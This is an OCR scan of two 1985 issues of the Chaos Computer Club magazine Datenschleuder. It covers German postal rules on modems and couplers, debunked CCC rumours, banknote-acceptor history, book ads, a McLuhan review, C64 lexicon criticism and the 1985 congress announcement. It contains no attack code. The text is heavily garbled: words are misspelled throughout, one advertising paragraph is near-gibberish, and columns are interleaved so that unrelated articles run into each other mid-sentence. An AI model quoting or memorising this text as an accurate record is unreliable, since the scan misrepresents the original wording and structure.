IO datenschleuder 13 ' Oktober 1985 ' C9927F ' Seite 5
f-I.I ‘M .-.■ii’'#r W
Rechtshilfe für Hacker
Die Katze darf das. . .
Ein Auszug der F&rnmefdeordnung der DBF. anscft/ieSend die dazugehörige Vetwaltungsanwei- 1
sung, die alle Modembesitzer angeht I
Paragraph 12 Abs. 7'. Der Teilnehmer darl die Tßilnehmereinnchtungcn nicht eigenmächtig ändern;
unzulässig ist auch das eigenmächtige Einschalten selbstbeschafiter Apparate. Mil Fernsprechapparaten
nicht elektrisch verbindbare Vorrichtungen und Gegenstände (Hillsvorrichtungen) durlen an diese nur
angebracht werden, wenn sie von der Deutschen Bundespost zugelassen sind. Unzulässig ist auch das
Bekleben posteigener Apparate.
Auszug aus der VwAnw. zu Abs. 7: Im Falle der Benutzung eigenmächtig geänderter Apparate oder
eigenmächtig eingeschalteter scibstbeschaffler Apparate werden die seibslbeschafiten Apparate abge-
schallet und dem Teilnetimer, unter Hinweis auf die Unzulässigkeit seines Handelns, die privaten
Einrichtungen AUSGEHÄNDIGT. Oie DBP stellt den nach den Teilrehmeninterlagen ausgewiesenen
flegelbestand gebührenpflichtig (FGV 1.4 Nr. 10) wieder her. Sind die posteigenen Einrichtungen nicht
mehr vorhanden oder sind sie beschädigt, so ist gemäß VwAnw 10 oder 11 wie im Falle des Verlustes
oder der Beschädigung zu verfahren; für weitere Maßnahmen und eine evtl, strafrechtliche Verfolgung
bei Benutzung nichtzugelassener Einrictitungeh sind die OPDn zuständig.
Erläuterung: Eine dressierle Katze darf, soweit unser juristischer Sachverstand reicht, beim Klingeln
abheben und den Hörer in den Kcppler packen. Sollte die Katze eine Prothese Iragen und damit abhoben,
wäre das widerum verboten.
Entsprechendes gilt für einen HiWi. der das für vielleicht 10 Mark pro Stunde macht Auch Hubmagneten
gelten nicht als angebracht und smü - im Gegensatz zu direct connecl Modems - bereits jetzt zugelassen,
ln England zugelassene Koooler werden hier benutzt Sollte die Post wagen, dagegen zu klagen, wird
Sie rach unserer Einschätzung spätestens vor dom europäischen Gerichtshof unterliegen. Derzeit ist die
uns bekannte Taktik der Post gegen fachgerechte OFU ohne Prüfnummer Verzögerung und Verwirrung,
Zum Vergleich: Daß jeder Journalist per Kassettenrekorder am Telefon seine Texte an die Redaktion
ubertragt, ist branchenüblich. Auch Ausländskorrespondenten haben keine Koppler mit Weltprufnummer.
weil es so einen Unfug nicht gibt. Gute Produkte lunktionieren normentsprecnend.
Wir planen, tn einer der nächsten Datenschleudern zu diesem Thema einen juristischen Fachbeilrag zu
bringen. ässbüS imanlaIO.ws 850929 1923
Konto Nr. 1 für Schmiergelder
Gelegentlich kursieren die wildesten (Teschichten
über den CCC durch die Szene. Ein Beispiel; Der
CCC hafte von einet Bank eine runde Million Mark
von Konto Nr, 1. dem für Schmiergelder, auf ein
Schweizer Nummernkonto transferiert. Oie Dank
soll anschließend einen Schlagertrupp geschickt
haben, der mehrere CCC-ler krankenhausreif ge¬
schlagen haben soll.
Solche Geschichten brachte ein B. aus Hamburg
ih Umlauf. El behauptete außerdem. ’Gründungs-
miighed" des CCC zu sein und zeigte - als
Beweis" - seine Eintrittskarte zum Chaos Com-
rnunicalionCongress'64 2u unserer Überraschung
gab es eine Reihe von Leuten, die cerartiges
glauben und tierisch sauer waren, wenn hinterher
irgendwas vor B. aus Hamburg ausgeliehenes. sei
es Hardware oder Geld, nicht zuruckkommt. Es i.st
eine linke Sache, ausgeheheneoder zur Reparatur
erhaltene Geräte weiierzuverscheuern (naiüriicn
ohne Geld an den eigenlliohen Besitzer weiterzu-
reichen). Die Kehrseite des Medienrummels über
Hacker ist blindes Vertrauen in solche Leute, Genau
wie mancher spende!, wenn einer an der Tür steht
und sagl. er sei vom Roten Kreuz, gibt es jetzt nul
dem CCC sowas, bloß sind die Türen an denen
angeklopff wird diejenigen von Firmen und Com-
puierfreaks. ln Hamburg wurde es theorelisch kei¬
ne halbe Slunde dauern, um einen Verein der S
•Geschädiglen zu gründen, es gibt ihn aber trotz¬
dem nicht. Vielleicht liegt der Grund dann, daß es
;edem peinlich ist. derart plump beschissen worden
zu sein. Die Konsequenzen für alle smd einfach
Wer derartig wirre Geschichten erzählt, disqualif--
zicrfsichsclbsf. Bci Unklarheiten hilft eine einfache
Rückfrage bei CCC. KGB o.ä.
Hacker haben es nicht nötig, sich zu verstecken, ct
burkha13.ws 850922
I U,',. '^ouk^i '■
CHEAP
Behandlung von Computerkrankheiten
I Digitales Denken
Das leise (Jüdelüt von eckigen Zahlen
J und runden Brüsten
Kein Theater- oder Kinobesuch, Keine U-5ahrtahrt,
. keine Veranstaltung, kein Treffen und kein Unter¬
richt mehr ohne das leise Oüdelut.
Kaum über der Wahrnehmungsgrenze dringt es
Uber unsere Ohrgange ins Hirn und meldet Punkt
' Uhr, Halb Uhr oder Termin.
Unuberl'orbares Signal der Quarzuhr ur>seres
’ Nachbarn FunIMeierweiierdienachsieGerausch-
' lirade Typ iiiie*litiii i oder nuep-micp
I Dann wieder Stille, wir lauschen dem Programm
! Was wir wahrgenommen haben, ist die if-carry-
I ihen-pieo-Zeil: programmierte Zeit-Schmpsel.
SO Kalorien lauten cie Daten, wenn ich ein Ei esse.
Wenn ich meine Scheckkarte in den Auiomaten-
schliiz schiebe, bm ich Nummer (gestrichen, ds)
Meine Identität soll zahlbar, meme Sinne meßbar
werden, um sie digital zu erlassen
icn rieche mchi den Rasen des Fußbaiiteiöes beim
darüber rennen, ich überprüfe meine Reaktionsge¬
schwindigkeit beim Compulerspiel 170(X) Punkte.
Die Theorie sitzt im Kopf. Computermannchen
platzen urio erscheinen, ungeberen, vom H'tnmei
gefallen, neu auf dom Bildschirm
Mitten in einer Conpulerzeitschrill zwischen greH-
bunicr Spiefreklame und eckigem Design stoße ich
auf zwei Seiten Haut und runde Brüste. Ein nackter
Frauenkorper wirbt für ein Pornoblatl.
Mein Körper nimmt seine Deformafion wahr, wenn
er seine Bedürfnisse in Zigaretten und Alkohol
kanalisiert oder in Therapiesitzungen herausbruflt.
ein weiblicher Körper benutzbar zur Kompensalion
unterdrückler Sinnichkeit
Nachdruck (softly extended) eines Leserbrief an
die taz von yi, dort abgedruckl am 29.5.84
Das CHAOS-TEAM weist darauf hin, daß eine ge¬
wisse Koordination zwischen digitalem/analogen
Denken/Tun lebensnotwendig ist und empfiehlt, um
die beschrelbenen Leiden zu vermeiden, bei der
Lektüre derartiger Computerzeitschriften vorsich¬
tig zu sein. Eine ähnliche Warnung zum Werbefern¬
sehen ist In der Hackerbibel und im wissenschaft¬
lichen Extrablatt zur IFA’85 (Beilage zur ds13J unter
der Überschrift Verrückt durchs TV abgedruckl und
verdient Beachtung.
Sichere Heilmethoden sind nicht bekannt. Die Lek¬
türe der datenschfeuder soll zwar helfende, aber
unklare Einflüsse auf verbissene Spieler ausüben.
Es wäre verkürzt, zu behaupten, die dalensch/eu-
der sei ein Heilmittel Im Sinne des Arzneimfttelge-
setzes. digdnk13.ws 860928 1433
— Sehr neehfl« Pnttlniniti-ii
dieser Brielksslen wird nicht mehr am
Wochenende oder in der Nacht geleert.
Um dieca.20-30 Mrd.DM teure Verhahe-
lung 2 U finanzieren muD die Post im
Brielverkehr Koslen einsparen.
Sie haben dalür sicher Verständnis!
Ihre POST
O!
'• "ln der westlichen Welt ist das Tempo des Post-
" dienstes seit langem vom Telefon und dem schnel¬
lt len Telexdiensl übcrtrollen. Eine wirklich wichtige
s Angelegenheit wiid heute zuerst per Telefon und
dann erst schriftlich übermittelt. Gleichzeitig ist der
Posldicnst wesentlich langsamei geworden. Mit
•• zunehmender Beschleunigung bei den allgemei-
^ nen Dienstleistungen korrmt es zu einer Verlang-
samung des allen Systems. Inelfizienz ist eine
'• natürliche Begleiterscheinurrg Jeder Eleschleuni-
s gung. da sie das alte System zerrüttet. Wenn das
3 alte System zu zerfallen droht, rult man nach
Spezialisten, dies es mit Hilfe der neuesten Tech-
nologicn stutzen sollen. Die Temposteigeiung. die
'• mit dem Posiaulo angelangen hat und dann mit
der Luftpost lorigesetit wurde, hat im Bereich der
^ Pcsisotfieiung zu Stockungen geführt."
•• (MLuhan. Wohin steuert die Welt’)
3 postoflO WS 850929 2330
® Zuviel Werbung!
|. Be-rtiPosiveisandCei SubsKnpuons^atmoa'edvr Hacherbib*»'
T Teil t tiieb vnseee SeniJu'>g Iwin- «mtiicheri GetKjiirerniu'pi
raihgen Ofofuncutg Werbung .im latw.h#r» Oer 0-v verdaen-
■ iiQo Seil« 3T iHat ,hi noerw»«» Uusi«n ooo» Senouci«'''* K.iuier
Sie 0iitz9ugi") Hau« ««eh als Apnischcrz a&«< *cg«n c«
J Ptriscs beim Oc2ugsb<n>Me>s «ul TAP A<.»gnCien Oie m ct»'
Uach«ibibei ktjinen Piatr rneiii ranot.*'» inuhii» aus «nen E»«iv
Diaien cne Soae cnTfe'm weroon Ci« nedjui'on peKbioil. OiO
leWie Sc'ierrulWeiburtgdes Vreiegeisundd«' Oaie'ist.ivwuce'
»auMU'eißen Um oi« Vorwcru'iq um di« rnorhiich vorscftwtn.
den« Seite zu losen und kiaizuiietieo daS .Sie mein z«r>S'#ci
wurde drucken w Si« nei>cnsicri«nd .-ib -jeOupr tj ws 9509)0
0300
Geldscheinfresser
( Sie vermehfon sich anders als Kanirrchen. aber
genauso schnell, die Schemscniuckcr Anfangs
prüften sie die Echtheit der Geldscheine ähnlich
s wie bei Münzen stimmen Lange. Breite und Dicke?
;j Jeder Zettel im richtigen Formal wurde angenom¬
men Irgendwann ging das nicht mehr, weil an ein
5 paar Stellen die Heiiigkeil gemessen wurde Auen
. das oe'^ügie nicht Em ds-Leser schickte emen
Zeitungsbericht Die betrogenen Automaten
schluckten :eere Zettel, aut denen nur em paar
Punkte markiert waren. Aber auch gute doppelsei-
l'ge Fotokopien, die Crautone Wiedergaben, kamen
mehl wieder raus. Die Papierauaiitat war wogen
j der Probteme ml der Oickenmessurrg problema¬
tisch. Alte Geldscheine quollen durch Handschweiß
f (grabbcl) auf Zudem waren die hochslgenaucn
Meßpparaturen sehr teuer und emplindhch Oie
, Automaten tehnien teilweise sogar druckfnschc
Ongmalschemchen ab. Seit 197$ wurden moder¬
nere Automaten cmgcsetzl. Sie maßen die Inten-
, siiai von verschiedenen Wellenlängen eines Prut-
I iicMs. das vom Geldschein reflektiert wurde (auch
im nicht sichtbar en Bereich). Oie Sensoren wurden
vor jeder Messung elektronisch nachgeeicht Die
, Lichlmeßpunkte waren eher Felder von em bis
f zwei Ouadraizeniimeiern Größe, weil so Ver¬
schmutzungen und Oruckaoweichungen von bis zu
^ 2 bis 3 mm ausgeglichen wurden Das Gerät wurde
I in der Schweiz hergestelll urxJ zuerst eingesetzt
und kostete um die 40(X) Mark. Aus einigen Kano-
j nen, ahh. Kantonen wurden bald größere Abwei¬
sungsquoten gemeldet Schuld waren geringe Far¬
babweichungen von Neudrucken der Nationalban-
, ken 1981 wurde dieses Problem durch Einsatz
eines Mikroprozessors gelost. Der ermittelte nach
jeder angenommenen Bankmtc einen neuen Farb-
miiielwert und wurde bei der Installation vom
I Monteur mit ca. 15 Random-Noten aus Supermärk-
I len der Umgebung gefüttert (was passiert aei je
fünf blauen, gelben und roten Scheinen? ). Mit
dieser Methode werden nur rund 1-3'/o der echten
Scheine zu Unrecht abgewiesen. Das scheint em
Kompromiß zwischen Benutzbarkeit und Sicherheit
zu sein Daß bei uns auch der Metallfaden geprüft
wird, versieht sich inzwischen Die nächste Auto-
matenversion wird noch mehr prüfen, aber auch
mehrere Schemsorten. ganz gteich. m wetcher
Richtung sie eingeschoben werden, annchmen
können. De Banken debattieren gegenwärtig über
die Einführung maschinenlesbaren Geldes - mit
Strichcode???
Zukunflsvision; Kärtchen reinslecken und einza.h-
len oder abheben. Bei gesperrlem Konto Fallgitter
von hinten.
Is42 Quellen: Archiv und vdi 1985-37;*^
geidprf3.ws 850929 2140
ics * OÜ.totxir * CQQ«l7tr * Seite 6
ZUKUNFTS-TECHNIKEN
Funktion — Anwendung — Folgen
Mißbrauch und alternative Chancen
von Achim Schwarze
Der Grüne Zweig 94
Die Zukunft rollt auf breiter Front an. Zukunftstech¬
niken sind die Schrittmacher der Veränderung unseres
Lebensraumes und unserer Kultur.
Alle keine Ahnung!
„Computer, Datennetze, Rechenzentren, Roboter,
Gentechnik: natürlich existieren die. Wie sie funktio¬
nieren? Keine Ahnung. Will ich auch gar nicht wissen!
Ich bin sowieso dagegen." So leicht kann man es sich
machen.
Suhuri
fDerspel
Die Zukunft rollt trotzdem an.
In ihrer glitzernden fach-chinesischen Karosserie. Und
keiner von uns Ignoranten kann sie bremsen oder gar
lenken! Die Zukunftstechniken werden eingesetzt und
krempeln unser Leben um. Wir bleiben die stolzen
Eingeborenen, die sich sicher sind, daß ihre Kamele die
Lastwagen des weißen Mannes überleben werden. Und
sich dabei ganz gehörig täuschen.
Hrsg. Warner Pieper & Konrad Volz
ZUKUNFTSPERSPEKTIVEN
MORGEN KINDER WIRDS WAS GEBEN
Der Grüne Zweig 88
Nehmen wir einmal an, es kommt nicht zum groi
Mit was können, müssen, dürfen und wollen wi
nen? Schon einmal konkrete Gedanken gemacht
In diesem Buch gibt es eine geballte Ladung davi
Wissen ist Mac ! t.
Wer nicht riurchblickt, kann sich nicht zur Wehr setzen
oder mivbsTtirnmen. Wer die Zukunft mitgestalten will,
muß infoimien. sein.
Aber Computer: das versteh ich nie!
Bequemer geht es wirklich nicht! Aber diese Ausrede
gilt nicht mehr: denn ,,ZUKUNFTS-TECHNIKEN"
von Achim Schwarze führt im Schongang in die Ge¬
heimnisse modernster Technologie ein. Vorwissen
braucht man nicht mitzubringen.
Zukunftstechniken sind flexibel.
Wie der Geist aus der Flasche dienen sie jedem Herrn.
Vorausgesetzt, er kennt die Schlüsselworte. Warum soll
man das eigentlich immer denen überlassen, die ohne¬
hin schon über soviel Macht verfügen und unseren Le¬
bensraum nur selten im Sinne seiner Bewohner gestal¬
ten? Lernen wir doch einfach selbst die magischen
Worte.
Alles halb so kompliziert!
Wer die wenigen Konzepte vor allem der Datentechnik
einmal verstanden hat, kann sich das meiste von allein
erdenken. Wo sie eingesetzt werden, wem das nützt
und was man anders machen könnte.
ISBN 3-922708-94-3 220 Seitenj^pBB
^
UERHER PIEPEI? ■,
I OIE BRÜHE mFT
bEO/EHEXFER/HEHrE
der Autoren: Antonietia Lilly, Hans CusTo, Pete
Buckminster Füller + Paul C. Msrtin, Achmed I
Cillie Rentmeister, Tim Leary, Gertrud Wild,
Neuss, Eugen Pietsch,
Die Themen: Interspezie-Kommunikation, Rs
nen, Bio Chips, Ersatiteilforschung für den Mi
Video Spiele -•- Energie Zauberer -i- der 100. Ai
alisierung innerer Riume -r Behinderten Hilfe
V. a.m. Viele Fakten, wenig Fiction.
Perspektiyen und Konzepte. Erklärungen der
.neuen' Begriffe und Worte.
Ein sanftes Verschworungsbuch mit Möglichl
das Laban in der Zeitenwende.
Global 2001.
Gestaltung: Horst Turner
156 S. DIN A4 ISBN 3-922708-S8-9flBH
John C. Lilly
DER SCIENTIST
Der Grüne Zweig 91
John C. Lilly ist einer der aufregendsten Fon
unserer Zeit. Er machte die Landkarten des Gel
bar, entwickelte den Isolationstank, arbeitet st
ren mit Delphinen, unterzog sich intensiver Dr
che und ist seit ein paar Jahren mit seiner Fra
sammen. Hier beschreibt er spannend, wie er v<
normalen Wissenschaftler zu einer herausrage
sönlichkeit wurde. Sein Leben in seinen Wc
Wunsch des Autors übersetzt von Werner Pieper
,,Dr. John Lilly ist ein Einmann-Kompendium
liehen Zivilisation." (New York Times)
„Lilly hat eine Vision — was Wissenschaft s
wenn sie nur die kraftvolle Methode mit der i
Offenheit zu allen Dimensionen der Realität vt
(Psychology Today)
175 Seiten, in Cooperation mit
dem Sphinx Verlag
_ - ‘ö*
. -i. 1-: -i.
" ?? “" ® atctt^i^lcubc^
•t*'. Mg
Fractals
ItForm, Oance
;and Dimension)
Benoit B. Mandelbrot
^977; 365 pp.
$ postpaid
Wohin steuert die Welt?
Echte originale Faksimile-Imitation
Mc Luhan beantwortet die Frage durch
das Auf-den-Punkl-bringen von Alltagser¬
lebnissen. Am besten ein Beispiel;
Bewundernde Freundin: Das ist aber ein
The Sierplnthi Spongr
Neues von Petra
Ihr Kind braucht Monster!
Positives Über Computerspiele steht in
einer Anzeige für "Unser Kind. Schwan¬
gerschaft. Erziehung und Gesundheit" Un¬
ter der Überschrift "Ihr Kind braucht Mon¬
ster" wird den Computerspielen eine Art
moderne Gebrüder-GrimrrvRolle zuge¬
teilt. petra 7/85, S. 133.
tieren von Disks für andere Rechner ist
deshalb nahezu unm^lich. Bei Fremd-
Floppies könnte man ein Torlenstück raus¬
schneiden. auf dem sich alle ersten Sek¬
toren aller Spuren befinden. Bei der 1541
ergäbe so ein Versuch Disketlensalat. Der
Vorteil der 1541 liegt darin, Fornnate er¬
zeugen zu können, die keiner versteht.
Gesamturtefl: Vom Kauf des Lexikons ist
abzuraten, da es eher verwirrt.
hübsches Baby, das Sie da haben!
Mutter; Ach, das ist noch garnichts • Sie
sollten mal sein Foto sehen!
Diese Arl des Moralisierens vernebelt die
Probleme und verhindert, daß den Opfern
jemals Hilfe zuteil wird.
Jedesmal, wenn eine neue Technologie
ein neues Angebotsmilieu schafft, ver¬
schlingt oder umzingelt sie das vorange¬
gangene, von der älteren Technologie ge¬
schaffene Angebotsmilieu. Die Auswir¬
kung dessen ist, in der Sprache des Thea¬
ters, ein "Kulissenwechsel".
Als der Buchdruck die neue umweltprä¬
gende Technologie war. wurde die ■'mitte¬
lalterliche Kulisse gewechselt". Die Druck¬
pressen spien Mengen alter Manuskripte
aus und warfen die ganze Vergangenheit,
die des Altertums und die des Mittelalters,
sozusagen in den Schoß der Renaissance.
Die Wiederherstellungskraft der elektrisch
gespeicherten Information (kurz; der
neuen Medien} ist heule so groß, daß sie
uns nicht (nur) die Vergangenheit, sondern
bereits die Gegenwart in den zeitgenössi¬
schen Schoß wirft. So wie der Renaissan¬
cemensch vom "Müll" oder den alten Klei¬
dern des Altertums überhäuft wurde, so
versinkt der moderne Mensch im Müll
sämtlicher rückständiger Gesellschaften
des Planeten sowie aller Kulturen, die je
auf dieser Welt existierten.
Aus dem Data-Becker-Buch
64er für Profis s. 86:
Verwenden Sie der Obersichtli^keit hal¬
ber so v/eie Unterprogramme wie irgend
möglich. Bei der Lektüre des Beispielpro¬
grammes ist - obwohl es eher kurz ist —
dauerndes Blättern angesagt.
Data-Becker-Lexikon zum C64
Sauefrafe; . . . Der C64 hat eine Baudrate
von 300 Baud. Unser Kommentar; Wenn
ein frei programmierbarer Computer eine
feste Baudrate hat. ist auch die Bandbreite
eines LKW mit Disketten bestimmbar.
softsektoriert: In jeder Diskene befindet
sich das sogenannte Indexloch. Dies kenn¬
zeichnet den Beginn der Spur Null.
Unser Kommentar: Die 1541-FIoppy ist so
billig gebaut, daß der Computer nicht weiß,
ob Spur Null erreicht wurde. Das einzig
sichere Verfahren erfordert es, maximal
40mal rückwärts gegen den Anschlag zu
fahren. Das Indexloch kennzeichnet bei
anderen Systemen “Gleich kommt Sektor
1 auf der aktuellen Spur". Commodore ließ
die dazu notwendige Optoelektrik weg.
Beim Formatieren wird die Sektoreintei¬
lung per Programm vorgenommen und
einfach drauflosgeschrieben in Unkennt¬
nis der Lage des Indexloches. Das Forma-
Wir suchen
Typen vom Typ homo sapiens computer-
fricus ostblocfcus. Kurz: Leute, die Com¬
puterfreaks in unserem Bruderstaat und
in den Ländern, mit denen dieser in einem
Bündnis ist. Auch Leute, die schon DFÜ-
Erfahrung nach dort oder von dort haben.
Sind uns willkomemen. Bitte schreibt uns
unter dem Stichwort "Ost/LSI 1” an die in
der Ortsgruppenliste angegebenen Adres¬
se. Dank sei euch.
Übrigens hat inzwischen auch die DDR
den Versand von Heimcomputern mit Cas-
settenrecorder gestattet! Beachtet aber
die entsprechenden NATO-
Ausfuhrverbote.
Werbung;
Die Hackerbibel - Ersatz fürs Postbuch '85?
Die echte große frische Hackerbibel ist
genauso groß wie das Postbuch 1984 (es
gibt nichts neueres) und auch so dick. "Oie
Post unser Freund und Vorbild." Oer
Hackerbibel-Umschlag ist aber - im Ge¬
gensatz zum Postbuch ‘84 - so steif, daß
die Hackerbibel Im Regal nicht w^rutscht,
auch wenn Teil eins ein Jahr alleine steht.
Ansonsten kann die Hackerbibel hilfswei¬
se als Postbuch '85 benutzt werden, "kein
amtliches Dienststück, Auskunft unter Vor¬
behalt". kurzzzllws 850928 1900
Ein schon vor einigen Jahren verfaßter
Brief des Anthropologen E. S. Carpenter
enthält Anmerkungen über einen weiteren
Aspekt dieses "Kulissenwechsels", der
bei jeder technischen Veränderung ein-
tritt:
In Los Angeles gibt es ein riesiges Lager¬
haus mit militärischen Überschußgütern,
die staatlichen Schulbehörden, Kranken¬
häusern usw, gegen Vergütung der Trans¬
portkosten zur Verfügung stehen. Jedes¬
mal. wenn ein Militärstützpunkt verlegt
wird, nehmen die Streitkräfte das mit. was
sie anderswo benötigen, lassen aber die
Masse des Materials zurück. Das sind
häufig ganze Siedlungen samt Kranken¬
häusern, Wohnungen, Tanks. Schiffe, usw.
All das wird dann ins nächstgelegene
staatliche Überschußdepot transferiert, wo
sich Colleges und Krankenhäuser unter
allem möglichen - von Badewannen bis
Zement - etwas Brauchbares aussuchen
können. Eine phantasiereiche Abenfeuer-
spielplatzgruppe könnte dort einen gro¬
ßartigen Spielplatz ausstalten: da gibt es
riesige Steuerungsanlagen aus großen
_Schiffen, in denen man durch Fernrohre
späht, Räder dreht. Fadenkreuze ver¬
schiebt, Plattformen bewegt, usw. - er-
Islaunliche elektronische Gebilde. Kosten
pro Einheit für die Regierung. 137 500
Dollar. In größeren Stückzahlen verfügbar
zum Preise von 4,99 Dollar, Zum Abtrans¬
port ist ein Kran erforderlich.
Gestern sah ich, wie ein Kerl ein phanta¬
stisches Ding herausschob, das aussah
wie ein Schaltbrett für den Start einer
Mondrakete und über und über mit Me¬
ßuhren, Zeigern und Lämpchen bedeckt
war. Auf die Frage, was das sei. antwortete
er: "Keine Ahnung. Ich bin Künstler. Es
kostete mich zwei Dollar."
McLuhan faßt das in den Satz "Der Mülla¬
spekt unserer Lebensweise war, ganz ein¬
fach aufgrund des Tempos der technolo¬
gischen Neuerungen, nie offensichtlicher
als heute" und empfiehlt: "Ausflippen. um
Schritt zu halten".
Das ist vernünftig. Gesamturteil: Stil und
Inhalt des Buches sind gut; seine Konse¬
quenzen hart. Beispiel für Freaks: Die
neue 16/32-Bit Computergeneration hat
erstmals zu erschwinglichen Preisen die
Rechenkapazität, das Pulsieren der ei¬
genen Hirnströme in Echtzeit und dreidi¬
mensional bunt auf dem Bildschirm dar¬
zustellen.
Buchdaten: ISBN3-203-50676-9 Marshall
Mc Luhan. Wohin steuert die Welt? Mas¬
senmedien und Gesellschaftsstruktur. Eu¬
ropaverlag Wien 1978. Is5
mluhan13.ws 850928 2000
Keine Ahnung, wie unsere Position ist.
(C) datenschleuder 13 ' Oktober 1985 • C9927F ' Seite 8
datenschleuder 14 = Dezember 1985 * C9927F
C9927F
DM 2,50
. $irttctt§iI)lcuS>ct
14 ä; Dezember 1985 ☆
V Das wlssenschaHllche Fachblatt lür Dalenrelsende
Em Ofgrtii clt'3 Chao? Cornrtuler Club
□
Chaos Communicatlon Congress '85
Die Europäische Hackerparty
Vom 27. bis 29. Dezamber 1935 veranstaltet der CCC
in Hamburg seinen diesjährigen Congress. Das Tref¬
fen der Datenreisenden, Telefonireoks, Datenpfad-
und Btx-Suchbaum-Flnder, der Sysops, Funkfreaka
und Netzflaneuran steht dieses Jahr unter dem Mot¬
to „Du Darfst“.
Die Namensgebung bezieht sich auf ein geplantes
Gesetz, das ab 1. Januar 1986 in Kraft treten sollte.
Das Gesetz stellt (In seiner gegenwärtigen Planungs¬
form) schon die versehentliche Anwahl einer Daten¬
bank durch eine Fehlverbindung der Post unter Strafe
und muß unter anderem deshalb noch überarbeitet
werden. Eigentlich sollte es der Bekämpfung der Wirt¬
schaftskriminalität dienen, aber die Materie ist eben
so kompliziert, daß die Hacker nebenbei und eher aus
Versehen getroffen werden könnten. Ist dann mit
einer Welle an Kriminalisierung im Kinderzimmer zu
rechnen? Werden dann auch Konzerne kriminalisiert?
immerhin preist eine große Firma ein Daddel-Spiel mit
dem Namen .HACKER' an. .Plötzlich sind Sie in
einem fremden Computer,.,“ steht in der Vierfarban-
zeige.
Positiv hingegen zeichnet sich eine andere Entwic¬
klung in der Szene ab. Circa 250 Mailbox-Systeme
(Bulietten-Boards) hängen in der Bundesrepublik am
Netz. Wenige unterscheiden sich, die meisten fallen
durch einheitliche Gleichmäßigkeit der Inhalte auf.
Aber in den Zentren keimt es. Einige Sysops gestalten
ihre Informationssysteme bewußt, sie agieren als elek¬
tronische Verleger. Sie sorgen nicht nur dafür, daß in
ihrem System Bits und Bytes mindestens so zuverläs¬
sig fließen wie das Teletonsystem verläßlich funktio¬
niert, sondern sie geben ihrer Mailbox ein Gesicht.
Diese Sysops werden langsam zu .network Wizards“,
jj, wie Dean Gengle sie im Buch .The Netweavers Sour-
^ cebook“ (ISBN 0-201—05208—3) beschreibl. Wur¬
de 1984 noch gefragt .Offene Netze — Warum?“,
heißt es jetzt .Du darfst". Es gibt inzwischen Systeme
mit aktuellen News von Greenpeace (besser als die
Zeitungen), andere bieten lokale News, wieder andere
Hintergrundinfos zu bestimmten Themen und und
und.
Der 28. Dezember wurde deshalb zum .Tag des Sys-
Op“ gemacht. Auf dem Congress wird das Konzept
eines überregionalen Intormationspools vorgestellt,
aus dem sich die kostenlosen Mailbox-Systeme be¬
dienen können.
Auch wenn diese Projekte in der Konzeption nicht¬
kommerziell sind, sind die Erfahrungen der .Großen“
wichtig — das gilt auch umgekehrt. Sysops bekannter
kommerzieller Mailbox-Systeme berichten aut dem
CCC’BS über ihre Erfahrungen und Perspektiven.
Auch die PosI ist eingeladen, über Telebox zu berich¬
ten. Lernen muß sie eh.
Einige Themen: Die Entwicklung von Meilbox i
die Zukunft der Vernetzung. Auf dem Congrei
sop-Verein" gegründet, der gemeinnützig und
digend Informationen aus einzelnen Mailboxs
dere vermittelt; eine neue Form von unzensie
tionsfrelheit. Hierzu laden interessierte Sysopt
Freunde aus anderen Ländern (bisher: AU,
USA) informieren über Entwicklungen in ihrem
erörtert die preisgünstigste Datenverbindung
Datenfunk. Aul dem Congress läuft eine Funkn
AX—25-Software beherrscht, kann vernetzi
Ans.5tzB werden sich dann schneller durchset
Cafe wird seihstgebackener Kuclien gereich
und Videorekorderwarten auf .Informationen"
tigen — Interessante Vorlagen bitte mitbring
Hackcenler ist auch noch da. Im Theater fint
hops (Vorträge, Diskussionen, Theater. . .] rr
nehmern stall. Wir überbieten das CHAOS d
res! Wr haben kaum Parkplätze, da am Freitai
auf dem Parkgelände des Tagungsortes der nt
che Wochenmarkt slattfindet. Es empfiehlt sii
Chen Verkehrsmittel. S-21/S-3 bis ELBGAUS1
nutzen.
Wegen der technischen Demonstrationen ge
llchkeiten als .Elektrisches Labor", in die nui
Personen Zutritt heben. Jeder Teilnehmer ha
Chen Funkamateuren oder Elektrikern vorher
machen. Das Mitführen von Fotoapparaten un
cordern ist aus Datenschutzgründen in den Cc
untersagt! Am Sonntag erhalten Pressevertr
aktiven Hacker sind, in den VormItlagsstundt
zur kostenlosen Information.
CCC85014.WS851120
^ äcfresMn, Gruppen, Tralfen...
CCC.HH: Charw.Team (RMI. IMCA. ComBo». ZEV. *(
Redaklion Datenschleuder, Schvrenckeslr. 85. OZOOt
T Bedaklionslrell dienstags 19 30 Uhr.
■38 Anrutbeanhrrofter Blx-Bedaktion 040.48375?
^ CCC-eertin (RMt) c7o Vinyl Boogle. Gleditschstr 45.
^ CCC.LÜbeck cro rrollwerk, MuhlenstraOe 49 hinten.
zjF CCC.HBnrKieBr, Trelt. dienstags ?0 Uhr Bistro Casa.
^ CCC.CM (RWI. ZEVBig Brolhet)
^ CCC Contoederatio Helvetica. Postf 544. CH.405t B
9(8 CAC (RMI.ZEV) Computer Artists Cologno. Haupipo!
^ Posllagerkarte 016454C. D-5000 Kolo 1 . Anrufbeaotv
^ BMP |r:EV.Cooi.Eloa.RMI.'g?04g?04) Bayrische Hackr
9(8 d /0 Basis, Adalbertslr. 41b. OPOOO München 40
11NHALT 0896 Inhaltsverzeichnis datenschle
1 CCC850 4864 Chaos Communicatlon Congi
2 STRASS 4608 The kids can't wait - Europa
2 HABIA23712 Die Hackcrblbel-weltweit in 1
3 BULLEN 7552 Polizei beschlagnahmt Taste
4 COOOOL 2304 Ruhe bewahren bei staatlict
5 RAMTEL 6272 Telefonabheben mit dem Gü'
5 INTERN 4224 Chaos Intern - Eine Momentai
4 CCC851 2816 Anmeldeformular zum CCC8!
5 BESUCH 4096 Ein Besuch bei der Pos!
6 MIFAZE 1792 Elektronische Mitfahrzenlrale
7 BESTELL.MAI aktuelles Bestellformular
8 PLAKAAT.GRX Aufruf zum CCC85 (vergrö6
THE KIDS CANTWAIT
Youngsters without means — what a future!
European Resolution
tonsequences o1 a wrong policy
The fact Ihat Europe. in comparison with the paciflc
border States, ts backward in technology is causing
much distress. Everybody is aware of the fact, but no-
body wants to take the blame; whether the State or
Industry is the culprit is hard to find out. Big Capital is
usually furnished as a panacea, mostly in the form of
grants to industry. Such a policy forgets one thing:
Progress can‘t be bought! Progress is the result of
the Creative power of Innovators. A small, however
well paid elite, can‘t be a substitute for this big group
in the end.
The core of the problem of Europe's lagging behind in
technology lies in the training of the present genera-
tion. Europe has a long tradition of etites and progress
and its exiqences are more and more hampered by
this tradilional structure.
Relevant encouragement should already be pari of training in
school and job. But already with regard to the equipment with
